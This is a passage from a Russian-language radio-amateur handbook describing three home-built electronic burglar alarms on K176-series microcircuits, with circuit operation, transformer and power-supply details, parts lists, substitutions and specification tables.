Принципиальная электрическая схема электронного устройства охраны и сигнализации, собранного на одной микросхеме, приведена на рис. 2. 6. Оно включает в свой состав следующие узлы и электронные устройства: входные цепи, сетевой понижающий трансформатор питания самодельной конструкции T1, два выпрямителя напряжения нерегулируемого типа, работающих на емкостные фильтры, два стабилизатора напряжения, на выходе которых действуют постоянные токи 5 и 12 В, блок электронной сирены и АС сигнализации.
Электронное охранное устройство подключается к сети переменного тока напряжением 220 В частотой 50 Гц с помощью электрического соединителя X1 типа «вилка», смонтированного с электрическим кабелем длиной от 1,5 до 2,3 м. На входе устройства установлен плавкий пре.дохранитель F1, защищающий от коротких замыканий во входных цепях, которые могут возникнуть при неправильной сборке и монтаже, а также при использовании некачественных комплектующих ЭРЭ и ЭРИ.
Параллельно первичной обмотке сетевого трансформатора установлен конденсатор С1, который защищает от помех, проникающих в сеть переменного тока. Емкость конденсатора данного фильтра может быть изменена в два раза от указанного на схеме, а его рабочее напряжение не может быть менее двойного амплитудного значения напряжения сети.
В охранном устройстве применен самодельный сетевой понижающий трансформатор питания Т1, который изготавливается на броневом магнитопроводе типа ШЛ и имеет одну катушку. Активная площадь поперечного сечения стали магнитопровода должна быть не менее 4...4,5 см2. Первичная обмотка трансформатора Т1 рассчитана на подключение к сети напряжением только 220 В и имеет повышенную прочность изоляции, выдерживающую испытательное напряжение 500Вэфф. Две вторичные обмотки трансформатора обеспечивают на выходе напряжение переменного тока 9,3 и 22 В в режиме холостого хода. Все обмотки трансформатора питания Т1 изолированы друг от друга, экран выполнен тонким эмалированным проводом, исключающим межвитковое замыкание и заземленным на корпус трансформатора.
Трансформатор питания обеспечивает трансформацию высокого напряжения переменного тока; расчетный уровень выпрямленного напряжения, необходимого для электропитания цепей электронной схемы; полную гальваническую развязку вторичных цепей устройства от сети переменного тока; дополнительную электробезопасность эксплуатации устройства.
Выпрямительное устройство с выходным напряжением 12 В выполнено на одном выпрямительном диоде VD1 по однофазной однополупериодной схеме, характеризующейся минимальным количеством примененных полупроводниковых диодов, простотой схемного решения, невысокой стоимостью изготовления, несколько пониженной частотой пульсации выпрямленного напряжения постоянного тока, равной частоте питающей сети, недостаточным использованием габаритной мощности сетевого трансформатора питания, подмагничиванием его магнитопровода постоянным током. На выходе выпрямителя установлен емкостный фильтр, собранный на конденсаторе СЗ.
Выпрямительное устройство с выходным напряжением постоянного тока на 5 В выполнено на четырех выпрямительных диодах малой мощности VD2—VD5, собранных по однофазной двухполупериодной мостовой схеме, характеризующейся повышенной частотой пульсации выпрямленного напряжения постоянного тока, низким обратным напряжением на комплекте выпрямительных диодов, хорошим использованием габаритной мощности сетевого трансформатора Т1, повышенным падением напряжения на диодах, невозможностью установки однотипных диодов на одном радиаторе охлаждения без изоляционных прокладок, пониженным кпд эксплуатации устройства. Работает выпрямитель на емкостный фильтр, собранный на конденсаторах С4 и Сб.
Стабилизатор напряжения 12 В нерегулируемого параметрического типа собран на стабилитроне VD6 и транзисторе VTI. Стабилизатор напряжения 5 В, также параметрического типа, выполнен на стабилитроне VD7, транзисторах VT2, VT3 и диодах VD8 и VD9. Стабилизатор напряжения 5 В имеет защиту от перегрузок и коротких замыканий в цепях нагрузки. Коэффициент стабилизации напряжения 12 В в три раза ниже, чем у стабилизатора напряжения 5В. Этот стабилизатор обеспечивает электропитание предварительного каскада сигнального устройства, собранного на транзисторах VT4— VT7. Для получения повышенной выходной мощности звукового сигнала в устройство включен оконечный каскад звуковой сирены, собранный на транзисторах VT8— VT11, который получает электропитание от стабилизатора 12 В.
Электронная сирена состоит из двух генераторов, собранных на одной ИМС DA1. Первый генератор вырабатывает импульсы фиксированной частоты следования, которая зависит от емкости конденсатора С12 и сопротивления резистора R6. Резистор R5, подключенный к первому выводу ИМС, ограничивает ток на входах ИМС, защищая ее от перегрузок. Электрическая цепь, образованная резисторами R7, R11 и конденсатором С9, формирует пилообразное напряжение, управляющее частотой второго генератора. Номинальные значения сопротивлений и емкости этой цени определяют скорость нарастания и спада частоты звучания электронной сирены, а от соотношений номиналов сопротивлений резисторов R7 и R11 зависят пределы ее изменения. Тональность электронной сирены определяется вторым генератором, выводы ИМС 8...11 Частота следования импульсов второго генератора и их длительность зависят от значений сопротивлений резисторов R9, R10 и емкостей конденсаторов С10 и С11.
Предварительный каскад усилителя мощности выходного сигнала собран по схеме эмиттерных повторителей на транзисторах VT4—VT7.
При включении сигнального устройства в сеть переменного тока схема переходит в режим ожидания и срабатывает после замыкания любых контактов переключателей S2—S5. Эти переключатели устанавливаются в различных местах охраняемых объектов, и по возможности скрытно.
Выходную мощность устройства можно увеличить в 1,5...1,6 раза за счет второго каскада усилителя звуковой частоты, собранного на транзисторах VT8—VT11.
В электронном устройстве охраны и сигнализации применяются следующие комплектующие самодельные и покупные изделия и ЭРЭ: сетевой понижающий трансформатор питания Т1 типа ШЛ броневой конструкции; ИМС DA1 типа К176ЛА7;
транзисторы VT1 типа КТ602Б, VT2 — П217Б, VT3 — П307, VT4 — КТ315Б, VT5 — КТ361Б, VT6 — КТ315Б, VT7 — КТ361Б, VT8 — КТ816А, VT9 — КТ817А, VT10 — КТ817А, VT11 — КТ816А; выпрямительные диоды VD1 типа КД504А, VD2—VD5 типа КД202В, VD8 — Д223, VD9 — Д223; стабилитроны VD7 типа КС147А, VD6 — Д813; конденсаторы С1 типа МБМ-П-бЗОВ-0,01 мкФ, С2 — К71-4-ЦП-0,1 мкФ, СЗ — К50-6-25В-330 мкФ, С4 — К50-6-16В-2000 мкФ, С5 — К50-6-16В-500 мкФ, С6 — К50-3-16В-2000 мкФ, С7 — К50-12-6.3В 680 мкФ, С8 — К50-ЗБ-6В-1000 мкФ, С9 — К50-ЗБ-6В-16 мкФ, С10-К73-9-510 пФ, СИ — К73-9-510 пф; резисторы R1 типа ВСа-0,25-1,5 кОм, R2 — ВСа-0.25-330 Ом, R3- ВСа 0,25-510 Ом, R4- ВСа-0,25-220 Ом, R5- ВСa- 0,125- 1,0 МОм, R6 - ВСа-0,125-1,0 МОм, R7 -- ВСa- 0,125- 100 кОм, R8 ВСа-0,125-220 Ом, R9 - ВСа-0,125-1,0 МОм, R10- ВСа -0,125-1,0 МОм, R11 — ВСа-0,125-51 кОм; предохранитель плавкий F1 типа ПМ-1-0,5 А; переключатели S1 типа П1Т- 1- 1, S2- S5 чипа МП-1-1; громкоговорители (динамические головки) ВА1-ВАЗ типа 0.5ГД-50; электрический соединитель X1 типа «вилка» с электрическим кабелем с двойной изоляцией длиной 1,5...2,3 м.
При монтаже, регулировке и ремонте электронного устройства охраны и сигнализации некоторые комплектующие изделия и ЭРЭ могут быть заменены аналогичными, не ухудшающими его основные электрические параметры и эксплуатационные характеристики. Например, ИМС типа К176ЛА7 может быть заменена на микросхему типов К561ЛЕ5, К176ЛЕ5; резисторы типа ВСа можно заменить на резисторы типов МЛТ, ОМЛТ, МТ, УЛИ, С1-4; конденсаторы типа К50-6 — на К50-3, К50-12, К50-16, К.50-20; выпрямительные диоды типа КД202В — на Д237А, Д226Г.
Моточные данные самодельного сетевого понижающего трансформатора питания Т1, примененного в электронном устройстве, приведены в табл. 2.8.
Таблица 2.8. Моточные данные сетевого понижающего трансформатора питания Т1, примененного в электронном устройстве охраны и сигнализации на одной микросхеме
Основные электрические параметры и технические характеристики электронного устройства охраны и сигнализации на одной микросхеме
Номинальное напряжение питающей сети переменного тока, В......................... 220
Номинальная частота питающейсети переменною тока, Гц ............................ 50
Стабилизированное напряжение постоянного тика
на выходе стабилизаторов, В .............. 5 и 12
Пределы изменения напряжения питающей сети
переменною тока, % .................... —15...+10
Пределы изменения частоты питающей сети переменного тока, %....................... ± 1
Коэффициент нелинейных искажении питающей
сети неременного тока, %, не более ......... 12
Коэффициент стабилизации выходного напряжения постоянного тока, не менее:
5 В .............................. 100
12 В ............................. 150
Амплитуда пульсации выпрямленного напряжения постоянного тока, мВ, не более ............. 15
Выходное напряжение на выводах обмоток сетевого трансформатора питания Т1, В:
3 и 4 .......................... .22
5 и 6 .......................... .9,3
Ток, потребляемый устройством в режиме холостого хода, мА, не более ..................... 5
Мощность, потребляемая устройством от сети во
время работы сирены, Вт, не менее .......... 50
Время срабатывания устройства после замыкания контактов, мс, не более .................. 5
Количество одновременно охраняемых объектов, шт ............................... 2...12
Время непрерывной работы сигнала тревоги
после замыкания контактов, мин, не менее ..... 40
Сопротивление изоляции токоведущих частей устройства между собой и между проводниками и корпусом, МОм, не менее ............... 10
Срок службы устройства, ч, не менее .......... 5000
Вероятность безотказной работы при риске заказчика в =0,92, не менее ............... 0,98
Помехозащищенность устройства в металлическом корпусе при воздействии внешнего электромагнитного поля, дБ
не менее ............... 100
кпд, %, не менее ........................ 85
Рис. 2.6. Принципиальная схема электронного устройства охраны и сигнализации на одной микросхеме.
2. 7. СИГНАЛЬНОЕ УСТРОЙСТВО НА ДВУХ МИКРОСХЕМАХ СЕРИИ К176
Рассматриваемое электронное устройство с охранной сигнализацией, выполненное на оптимальном количестве широко применяемых комплектующих ЭРИ и ЭРЭ, может эксплуатироваться в сложных климатических условиях, при повышенной относительной влажности, пониженном атмосферном давлении воздуха и повышенной температуре окружающей среды. Электронное сигнальное устройство устойчиво работает при температуре от —40 до 50 °С, относительной влажности до 98% при температуре 22 °С. и атмосферном давлении от 200 до 900 мм рт. ст.
Данное устройство предназначено для охраны жилых и производственно-хозяйственных помещений и различных транспортных средств. В последнем случае устройство работает в автономном режиме от аккумуляторной батареи. Область применения сигнального устройства может быть расширена, если вместо конечных переключателей S5—S7 проложить проволочный шлейф по периметру охраняемого объекта. При этом общая длина шлейфа из провода диаметром до 0, 12 мм может быть увеличена до 0, 5 км. В зависимости от конструктивного исполнения охранное устройство позволяет подключать к его входам микроминиатюрные датчики, световые и звуковые сигнализаторы, проволочный шлейф. Достаточная простота схемно-технического решения, минимальное количество комплектующих изделий и ЭРЭ общего назначения, несложное конструктивно-технологическое решение и небольшая стоимость изготовления делают данное устройство доступным для повторения начинающими радиолюбителями, оно может быть рекомендовано к тиражированию в цехах малых предприятий, акционерных обществ и производственных кооперативов.
Принципиальная электрическая схема охранного сигнального устройства бытового назначения, выполненного на двух ИМС серии К176, приведена на рис. 2. 7. Как следует из схемы, сигнальное устройство включает в свой состав входные цепи, сетевой понижающий трансформатор питания Т1, автономный источник электропитания GB1, выпрямительное устройство нерегулируемого типа, которое работает на емкостный фильтр, ПСН, электронное сигнальное устройство, собранное на двух ИМС, выходные цепи и АС тревожной сигнализации.
Входное устройство содержит электрический соединитель X1 типа «вилка», смонтированный с электрическим кабелем с двойной изоляцией и длиной не менее 1, 5 м. Вилка обеспечивает подключение к стандартной розетке электрической сети переменного тока напряжением 220 В частотой 50 Гц. Плавкий предохранитель F1, установленный на входе, защищает электрические цепи устройства от перегрузок и коротких замыканий. Индикаторная лампа Н2 тлеющего разряда и лампа накаливания H1, установленные параллельно первичной и вторичной обмоткам трансформатора, сигнализируют о готовности охранного устройства к работе. Малогабаритные зажимные клеммы Х2 и ХЗ служат для подключения автономного источника питания постоянного тока напряжением 9 В.
Сетевой понижающий трансформатор питания Т1 изготавливается на магнитопроводе типа Ш или ШЛ броневой конструкции с одной катушкой, которая устанавливается на центральном стержне магнитопровода. Активная площадь поперечного сечения стали маг-нитопровода должна быть не менее 3 см2. На катушку с жестким каркасом наматывается провод в эмалированной изоляции повышенной электрической прочности рядовой намоткой с прокладками из кабельной бумаги как между рядами, так и между обмотками. В качестве изоляции можно использовать также лакоткань или конденсаторную бумагу толщиной до 0, 05 мм. Самодельный трансформатор питания должен быть изготовлен в полном соответствии с данными, приведенными в табл. 2. 9. В сигнальном устройстве можно использовать готовый покупной унифицированный трансформатор серии «Габарит» или трансформаторы типов ТА, ТН, ТАН, ТПП, ТС, ТТ с соответствующими выходными параметрами и техническими характеристиками.
Сетевой понижающий трансформатор формирует на выходных обмотках напряжение переменного тока низкого напряжения, соответствующее расчетному выходному напряжению выпрямителя. Трансформатор обеспечивает полную гальваническую развязку вторичных цепей электронной схемы от высокого напряжения сети переменного тока. Низкое выходное напряжение питания узлов схемы обеспечивает дополнительную электробезопасность при эксплуатации устройства.
Выпрямитель нерегулируемого типа собран по схеме Греца по однофазной двухполупериодной мостовой схеме на четырех выпрямительных диодах VD1—VD4 средней мощности. Выпрямитель работает на емкостную нагрузку на конденсаторе С1, обеспечивает повышенную частоту пульсации выпрямленного напряжения постоянного тока, хорошее использование габаритной мощности трансформатора питания, низкое обратное напряжение на комп-
Таблица 2. 9. Моточные данные сетевого понижающего трансформатора питания Т1, примененного в сигнальном устройстве на двух микросхемах серии К176
лекте выпрямительных диодов, но имеет повышенное падение напряжения на диодах, снижающее общий кпд устройства. Диоды данного выпрямителя нельзя установить на общий радиатор охлаждения без изоляционных прокладок. Выпрямитель защищен от перегрузок плавким предохранителем F2.
Выпрямленное и сглаженное фильтром С1 постоянное напряжение подается на нерегулируемый стабилизатор напряжения параметрического типа, собранный на стабилитроне VD5, мощном низкочастотном транзисторе VT1 и резисторе R1. На выходе параметрического стабилизатора действует напряжение, равное 9 В. Аккумуляторная батарея или внешний источник включается при автономном режиме работы однополюсным переключателем S2.
Собственно сигнальное устройство собрано на двух ИМС DA1, DA2, двух биполярных транзисторах VT2, VT3 и выпрямительных диодах VD6—VD11, которые выполняют различные функции в электронной схеме. Звуковой сигнал тревоги подается при замыкании контактов переключателя S4 или при размыкании контактов микропереключателей S5—S7, устанавливаемых скрытно на
охраняемых объектах. Включение сигнального устройства в работу осуществляется сначала переключателем S1 и затем переключателем S3 при электропитании от сети переменного тока и переключателями S2 и S3 при питании от автономного источника. После замыкания контактов этих переключателей начинает заряжаться конденсатор С6 через резистор R4. Напряжение с резистора R4 подается на вход ИМС DA1 (вход 2 инвертора) и на R-входы второй ИМС DA2, которые переходят в положение низкого уровня логического нуля.
ИМС имеют в своем составе следующие функциональные элементы: ИМС DA1 состоит из четырех логических элементов 2ИЛИ-НЕ, ИМС DA2 — из двух триггеров 0-типа.
Конденсаторы СЗ и С4 заряжаются через диоды VD7, VD8 напряжением, поступающим с инверторного выхода ИМС DA2 (вывод 2), уровень на котором устанавливается как логическая единица. Во время зарядки конденсаторов СЗ и С4 замыкание контактов переключателя S4 не приводит к срабатыванию сигнального устройства. После зарядки конденсаторов СЗ, С4 сигнальное устройство переходит в дежурный режим. В это время на входе ИМС DA1 и R-входах схемы DA2 устанавливается низкий уровень, соответствующий логическому нулю.
При замыкании контактов переключателя S4 на выходе ИМС DA1 (вывод 3) появится высокий уровень логической единицы, напряжение с которого переключит первый триггер ИМС DA2, так как на его входе (вывод 1) нет удерживающего напряжения. Конденсаторы СЗ и С4 начинают разряжаться через резисторы R6 и R.7. Напряжение на выводе 8 ИМС DA1 уменьшится до нуля, что приводит к включению мультивибратора, собранного по схеме ИЛИ-НЕ (выводы 8.. .13), в цепь которого включен времязадающий конденсатор С7. С выхода мультивибратора импульсы поступают на счетный вход триггера ИМС DA2 (вывод 11). С выхода второго триггера (вывод 13) ИМС DA2 сигналы подаются на базу транзистора VT3, который включен как эмиттерный повторитель. Далее с нагрузочного резистора R3 импульсное напряжение поступает на транзистор VT2, который работает в выходном каскаде и нагрузкой которого является АС. Конденсатор СЗ разряжается до нуля, что приводит к появлению на выходе инвертора ИМС DAI (вывод 4) высокого уровня логической единицы, напряжение с которою через диод VD11 воздействует на R-входы обоих триггеров ИМС DA2.
Триггеры устанавливаются в нулевое положение, и конденсаторы СЗ и С4 вновь заряжаются. На выходе инвертора ИМС DА1 снова появляется низкий уровень логического нуля. Процесс возврата в это состояние происходит автоматически в течение заданного времени (примерно 3...3,5 мин), после чего сигнальное устройство возвращается в дежурный режим работы.
Как указывалось ранее, в сигнальном устройстве для скрытного установления датчиков кроме нормально разомкнутых контактов переключателя S4 имеется ряд нормально замкнутых контактов, работающих на обрыв электрической цепи.
При изготовлении сигнального устройства рекомендуется применить блочный вариант включения исполнительных устройств. В первую очередь всю электронную часть устройства необходимо выполнить как БЭ, изготовив его в виде самостоятельной сборочной единицы, и предусмотреть три входа для включения датчиков различного типа и назначения.
Первый вход должен быть предназначен для работы с датчиком S4, который устанавливается на входной двери охраняемого объекта и обеспечивает задержку включения сигнала тревоги, что позволяет владельцу отключить сирену при входе в помещение выключателем S3, установленным в скрытом месте, и тем самым избежать ложной тревоги.
Второй вход предназначен для работы с датчиками S5—S7, размещенными на окнах, внутренних дверях, сейфах и т. д. Срабатывание устройства от сигналов этих датчиков происходит мгновенно.
Третий вход — для подключения шлейфного датчика, который устанавливается в том случае, если не применяются датчики S5—S7. Шлейфный датчик представляет собой тонкий провод (фольгу), натянутый по периметру охраняемого помещения или наклеенный на стекла окон. Обрыв этого провода (фольги) приводит к мгновенному срабатыванию устройства.
Второй и третий входы должны быть конструктивно объединены для того, чтобы предотвратить ложные срабатывания.
На выходе устройства необходимо предусмотреть возможность подключения блока громкоговорителей.
Переключатели (датчики) S5—S7 могут быть установлены в различных местах охраняемых объектов. При размыкании любого контакта одного из этих датчиков на выходе первого триггера ИМС DA2 (вывод 6) появляется высокий уровень логической единицы, а конденсатор СЗ начинает разряжаться до нуля, включая питание мультивибратора. Сигнальное устройство включается на подачу акустических сигналов с промежутками неограниченно долгими. В дежурный режим работы устройство возвращается после замыкания ранее разомкнутой цепи и после полного разряда конденсатора СЗ.
В рассматриваемом сигнальном устройстве применяются следующие комплектующие самодельные и покупные ЭРИ и ЭРЭ: сетевой понижающий трансформатор питания T1 типа ШЛ броневой конструкции; ИМС DA1 типа К176ЛЕ5, DA2 — К176ТМ2; транзисторы VT1 типа КТ815А, VT2 — КТ801Б, VT3 — КТ315Б; выпрямительные диоды VD1—VD4 типа Д237А, VD6—VD11 типа Д220; стабилитрон VD5 типа Д814Б;
конденсаторы С1 типа К50-6-16В-1000 мкФ, С2 — МБМ-11-160В-0.033 мкФ, СЗ — К52-5-16В-47 мкФ, С4 — К52-5-16В-22 мкФ, С5 — К10-7В-0,1 мкФ, С6 — К50-16-16В-100 мкФ, С7 — К10-7В-50В-Н70-0.22 мкФ; резисторы R1 типа МЛТ-0,5-360 Ом, R2 — МЛТ-0,25-390 Ом, R3 — МЛТ-0,25-3 кОм, R4 — МЛТ-0,5-270 кОм, R5 — МЛТ-0,25-20 кОм, R6 — МЛТ-0,25-560 кОм, R7 — МЛТ-0,25-3,3 МОм, R8 — МЛТ-0,25-820 кОм, R9 — МЛТ-0,25-20 кОм, R10 — МЛТ-0,25-10 кОм, R11 — МЛТ-0,25-2 кОм, R12 — МЛТ-0,25-1,5 МОм; переключатели S1 типа П2Т-1-1, S2 — П1T-1-1, S3—S7 типа МПЗ-1; предохранители F1, F2 плавкие типа ВПБ6-1; индикаторные лампы H1 типа МН-6,3-0,22А, Н2 — ТН-2; электрические соединители X1 типа «вилка» с электрическим кабелем, имеющим двойную изоляцию, Х2, ХЗ типа КМЗ-1; излучающие головки громкоговорителей BA1, BA2 типа ЗГД-38Е; аккумуляторная батарея GB1 типа 11ЦНК-0.45.
При монтаже, регулировке и ремонте сигнального устройства некоторые типы комплектующих ЭРИ и ЭРЭ могут быть заменены другими аналогичными, не ухудшающими основные электрические параметры устройства и его эксплуатационные характеристики. Например, резисторы типа МЛТ можно заменить на резисторы типов ВСа, ВС, ОМЛТ, КИМ, С2-6, С1-8; оксидные электролитические конденсаторы типа К50-6 — на К50-3, К50-12, К50-16, К50-20; выпрямительные диоды типа Д237А — на Д226, КД105А, КД205К; диоды типа Д220 — на Д220А,
КД510А, КД521Л; стабилитрон типа Д814Б - на Д815Г, Д818А. При сборке и монтаже устройства обеспечивается защита всех элементов схемы изоляционными лаками от воздействия внешних климатических факторов, а также от воздействия статического электричества.
Основные электрические параметры и технические характеристики сигнального устройства на двух микросхемах серии К176
Номинальное напряжение питающей сети
переменного тока,В ....................... .220
Номинальная частота питающей сети переменного тика, Гц ........................ .50
Номинальное напряжение автономного источника
питания постоянного тока, В .............. .9
Пределы изменения напряжения питающей сети
переменного тока, % ................... .—15...+10
Пределы изменения частоты питающей сети неременного тика, % ..................... .±1
Пределы изменения напряжения автономного
источника питания, В ................... .7...12
Выходное напряжение на выводах обмоток сетевого понижающего трансформатора Т1, В:
4 и 5 ............................ .9,1
6 и 7 ............................ .6,2
Выходное стабилизированное напряжение, В ..... .9
Коэффициент стабилизации напряжения постоянного тока на выходе стабилизатора, не менее . . . .100
Амплитуда пульсации выпрямленного напряжения, мВ, не более ......................... .15
Ток, потребляемый устройством в дежурном режиме работы от сети переменного тока, мА, не более ............................ .10
Выходная мощность звуковою сигнала, Вт ...... .4
Ток, потребляемый устройством в дежурном режиме работы от автономного источника питания, мкА, не более ........................ .30
Мощность, потребляемая устройством от сети в
дежурном режиме работы, Вт ............. .0,1
Время подачи звукового сигнала в рабочем режиме работы, мин, не менее .............. .3,5
Длина периметра установки шлейфа или переключателей S5—S7 при монтаже проводом в эмалированной изоляции диаметром 0,12 мм, м, не менее ............................ .500
Время задержки подачи звукового сигнала после замыкания контактов переключателя S4, с, не менее ............................ .10
Вероятность безотказной работы устройства при
риске заказчика в=0,92, не менее .......... .0,98
Срок службы устройства, ч, не менее ......... .10 000
Помехозащищенность устройства при напряженности внешнего электрического поля в полосе частот 0.15...30 МГц, дБ ...................... .120
То же к сетевым помехам, дБ, не менее ........ 80
То же к магнитным помехам, дБ, не менее ...... 100
Сопротивление изоляции токоведущих частей устройства относи тельно металлического корпуса, МОм, не менее ........... 10 кпд, %, не менее ........................ 75
Рис. 2.7. Принципиальная схема сигнального устройства на двух микросхемах серии К 176
2. 8. ЭЛЕКТРОННОЕ ОХРАННОЕ УСТРОЙСТВО ДЛЯ ПРИУСАДЕБНОГО УЧАСТКА
Это охранное устройство является частью системы, разработанной для установки на садово-огородных и приусадебных участках для одновременной охраны сразу нескольких близко расположенных друг от друга помещений и объектов: дома, гаража, хозблока, погреба, стационарного наружного термостата для хранения различных сельскохозяйственных продуктов, сарая, курятника и др. Данное универсальное устройство обеспечивает полную сохранность имущества, работая в комплекте с другими устройствами, передающими информацию на центральный пульт. Электронное устройство срабатывает при проникновении постороннего лица на охраняемый объект или в помещение, подавая либо звуковой, либо световой сигнал тревоги, либо передавая электромагнитный сигнал на обслуживаемый общий пульт управления. Если вместо микропереключателей S1—S4, работающих на размыкание, проложить тонкий обмоточный эмалированный провод диаметром 0, 08... 0, 12 мм по периметру охраняемого объекта, то обрыв его в любой точке также приводит к срабатыванию сторожевого устройства.
Принципиальная электрическая схема охранного устройства, выполненная на минимальном количестве комплектующих ЭРЭ, приведена на рис. 2. 8. Конструктивно охранное устройство рекомендуется изготовить в виде двух функциональных сборочных единиц: БП и блока электронного управления. Блок электропитания работает от сети переменного тока напряжением 220 В частотой 50 Гц и, как видно из принципиальной схемы, в свою очередь состоит из входных цепей, сетевого понижающего трансформатора питания T1, выпрямителя, работающего на емкостный фильтр, и электронного стабилизатора напряжения. Электронный блок управления включает в свой состав две ИМС DA1 и DA2, комплект концевых микровыключателей и ИМ любого принципа действия, например электромагнитное или электронное реле или радиоизлучатель.
Входные цепи электронного сторожа обеспечивают подключение его к сети переменного тока с помощью электрического соединителя X1 типа «вилка», смонтированною с электрическим кабелем, имеющим повышенное сопротивление изоляции; обеспечивают предохранение элементов схемы от коротких замыкании и перегрузок с помощью плавкого предохранителя F1; обеспечивают сигнализацию о готовности устройства к эксплуатации с помощью индикаторной лампы H1 тлеющего разряда, включенной в сеть переменного тока. Включение электропитания осуществляется переключателем В1.
Сетевой понижающий трансформатор питания Т1 изготавливается на броневом ленточном магнитопроводе типа ШЛ. В данном случае в сторожевом устройстве использован унифицированный трансформатор типа ТН2-127/220-50. Сетевой трансформатор обеспечивает расчетный уровень выпрямленного напряжения, полную гальваническую развязку вторичных цепей охранного устройства от сети высокого напряжения переменного тока, а также дополнительную электробезопасность при эксплуатации. Первичная обмотка трансформатора рассчитана на подключение к сети переменного тока напряжением 220 или 127 В частотой 50 Гц. На вторичной обмотке сетевого трансформатора действует переменное напряжение в режиме нагрузки: 6, 3; 5, 0; 1, 3 В (выводы 7 и 8, 9 и 10, 10 и 11 соответственно). Для изготовления самодельного трансформатора в табл. 2. 10 приведены все необходимые сведения. При изготовлении трансформатора надо особое внимание уделить изоляции рядов обмоточного провода как между собой, так и между обмотками, а также пропитке изоляционными лаками.
Выпрямитель собран по однофазной двухполупериодной мостовой схеме на четырех выпрямительных диодах VD1—VD4. Выпрямитель обеспечивает на выходе постоянное напряжение 9 В. Вместо четырех диодов можно использовать одну диодную сборку типа КЦ, которая значительно улучшает технологичность изготовления БП и характеризуется среди других выпрямительных схем улучшенными параметрами постоянного тока. К достоинствам данной мостовой схемы, следует отнести повышенную частоту пульсации выпрямленного напряжения
Таблица 2. 10. Моточные данные сетевого понижающего трансформатора питания Т1, примененного в электронном охранном устройстве для приусадебного участка
постоянного тока, хорошее использование габаритной мощности сетевого трансформатора, пониженное обратное напряжение на комплекте выпрямительных диодов. Однако мостовые схемы выпрямления тока имеют и некоторые недостатки. Это, в первую очередь, повышенные потери, более низкий кпд, большое количество примененных диодов, повышенная стоимость изготовления, невозможность установки диодов на одном радиаторе охлаждения без изоляционных прокладок (если не применяется диодная сборка). Для увеличения выходной мощности выпрямительного устройства можно использовать аналогичные диоды большей мощности.
В случае отсутствия на садово-огородном участке сетевого напряжения переменного тока в сторожевом устройстве предусматривается электропитание от встроенного или внешнего автономного источника питания постоянного тока, имеющего выходное напряжение 9 В.
Электронная часть охранного устройства собрана на двух ИМС DA1 и DA2 серии К176, которые имеют в своем составе два триггера (выводы 8, 9, 10 и 11, 12, 13); компараторы напряжения и инверторы. В ИМС DA1 компаратор имеет выводы 1, 2 и 3. С такими же выводами работает компаратор ИМС. DA2.
Следует заметить, что компаратор в данном случае является устройством, включенным по схеме ИП для сравнения измеряемой величины с эталоном, а инвертор устройством, преобразующим сигнал низкого уровня логического нуля на входе в сигнал высокого уровня логической единицы на выходе и наоборот, что эквивалентно операции отрицания.
Использование ИМС данной серии (КМОП) позволяет охранному устройству иметь значительный запас времени эксплуатации от автономного источника электропитания, так как в дежурном режиме потребление энергии не превышает 4 мкА.
В дежурный режим работы устройство устанавливается переключателями В1 и В2 типа «тумблер» в зависимости от источника питания. После включения напряжение поступает на конденсатор С5 и начинается его зарядка через резистор R4. В это время на входе первого компаратора напряжения ИМС DA1 (выводы 1 и 2) действует высокий уровень логической единицы, а на его выходе (вывод 3) — низкий уровень логического нуля. До тех пор пока контакты конечных выключателей S1— S4 замкнуты, на выходе инвертора ИМС DA1 (выводы 4, 5, 6) будет высокий уровень и триггер ИМС установится в такое положение, когда на его выходе (вывод 10) будет низкий уровень — уровень логического нуля. В этом случае на выходе группы параллельно включенных инверторов второй ИМС (выводы 4, 5, 6 и 11, 12, 13} появится также низкий уровень, светодиод оптрона VТ4 будет выключен, фотодинистор закрыт и исполнительное устройство К1 обесточено. Пока конденсатор С4 не зарядится, устройство при замкнутых контактах выключателей S1—S4 находится в режиме подготовки к эксплуатации. Время зарядки конденсатора С4 регулируется в достаточно широких пределах — от 0 до 45 с, в течение которого исполнительное устройство остается отключенным. Если устройство установлено на входной двери, то за указанное время необходимо выйти из помещения и закрыть дверь. Таким образом, в пределах времени зарядки конденсатора С4 контакты переключателей S1— S4 можно размыкать и замыкать сколько угодно раз, при этом состояние триггера первой ИМС не изменится
и сигнал тревоги не прозвучит, так как не будет подано напряжение на исполнительное устройство. После зарядки конденсатора С4 до напряжения питания на выходе компаратора первой ИМС DA1 (выводы 1, 2, 3) появится высокий уровень логической единицы и охранное устройство будет готово реагировать на разомкнутое положение контактов переключателей S1—S4.
При проникновении на охраняемый объект постороннего лица и размыкании одной пары контактов конечных выключателей S2—S4 первый триггер ИМС переключится, а на выходе (вывод 10) появится высокий уровень логической единицы. С этого момента начинается зарядка конденсатора С5 через резистор R4, в течение которой исполнительное устройство остается включенным. И в это же время начинается зарядка конденсатора С4 и снова триггер не реагирует на изменение состояния контактов S1—S4. Следовательно, закрыванием двери после несанкционированного проникновения внутрь помещения уже нельзя предотвратить подачу сигнала тревоги. После окончания зарядки конденсатора С5 происходит смена логического уровня на выходе компаратора второй ИМС и выходе, включающем оптрон, который в свою очередь включает и приводит в действие ИМ сигнализации. Для того чтобы тревожная сигнализация была отключена, надо в период зарядки конденсатора С4 (20... 45 с) после открывания дверей или другого объекта отключить БП от сети переменного тока или питание от автономной батареи. Выключатели электропитания В1 и В2 необходимо размещать в скрытом от посторонних лиц месте, о котором должны знать только члены семьи или дежурные на объектах охраны.
Монтаж сторожевого устройства рекомендуется осуществлять на односторонней печатной плате, размеры которой не превышают 120Х80 мм, использовав для пайки припой марки ПОС-60. В качестве ИМ К1 может быть использовано реле электромагнитной системы, управляемый магнит, соленоид или другое устройство с электромеханическим приводом. Переключатели S1—S4 с контактными парами могут быть любой конструкции, но они должны быть такими, чтобы их можно было закрепить на дверях или окнах охраняемых объектов. Хорошие результаты могут быть получены при применении магнитоуправляемых контактов, герконовых реле, которые имеют соответствующую арматуру для крепления и установки. Могут быть применены также контакты, широко используемые в промышленных
системах охранной сигнализации. Рассматриваемое охранное устройство допускает подключение практически неограниченного числа пар контактов, расположенных в различных частях приусадебного участка. При этом все пары контактов соединяются последовательно. В случае обрыва соединительных проводов от той или иной пары контактов электронное устройство тотчас же подаст сигнал тревоги.
Перечень основных покупных комплектующих ЭРИ и ЭРЭ, применяющихся в электронном охранном устройстве, и рекомендации по их замене приведены в табл. 2. 11.
Таблица 2.11. Перечень основных комплектующих ЭРИ и ЭРЭ, применяющихся в электронном сторожевом устройстве, и их возможная замена
Окончание табл. 2.11
Основные электрические параметры и технические характеристики электронного охранного устройства для приусадебного участка
Номинальное напряжение питающей сети переменного тока, В.......................... 220 или 127
